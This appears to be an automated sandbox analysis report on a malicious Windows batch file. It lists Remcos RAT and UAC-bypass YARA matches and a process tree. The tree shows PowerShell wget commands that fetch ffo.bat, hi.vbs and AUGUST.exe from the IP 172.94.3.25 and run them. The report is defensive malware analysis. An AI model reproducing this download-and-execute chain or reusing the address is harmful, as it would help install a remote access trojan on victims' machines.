Source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 25.2.cmd.exe.5615757.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.cmd.exe.5634757.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.cmd.exe.4a66757.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.explorer.exe.4e7a757.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 25.2.cmd.exe.5614b57.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.DZIPR.exe.356e901.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.cmd.exe.5633b57.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.explorer.exe.4dbb757.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 27.2.explorer.exe.4ba8a8a.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001C.00000002.3213654065.0000000002F1B000.00000004.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 5476, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 5900, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4016, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 1488, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4256, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 5972, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: classification engine

Classification label: mal100.troj.expl.evad.winBAT@42/32@0/2

Source: C:\Users\user\AppData\Roaming\AUGUST.exe

Code function: 14_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

14_2_00407776

Source: C:\Users\user\AppData\Roaming\AUGUST.exe

Code function: 14_2_0040118A GetDiskFreeSpaceExW,SendMessageW,

14_2_0040118A

Source: C:\Users\user\AppData\Roaming\AUGUST.exe

Code function: 14_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,

14_2_004034C1

Source: C:\Users\user\AppData\Roaming\AUGUST.exe

Code function: 14_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,

14_2_00401BDF

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\ffo.bat

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3380:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjs0e3py.sx3.ps1

Jump to behavior

Source: Yara match	File source: 15.0.DZIPR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.2725735029.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2720616296.00000000026D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\DZIPR.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, type: DROPPED

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\55Ka50lb6Z.bat" "

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Windows\System32\cmd.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\55Ka50lb6Z.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exe
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"
Source: C:\Users\user\DZIPR.exe	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe "C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Process created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
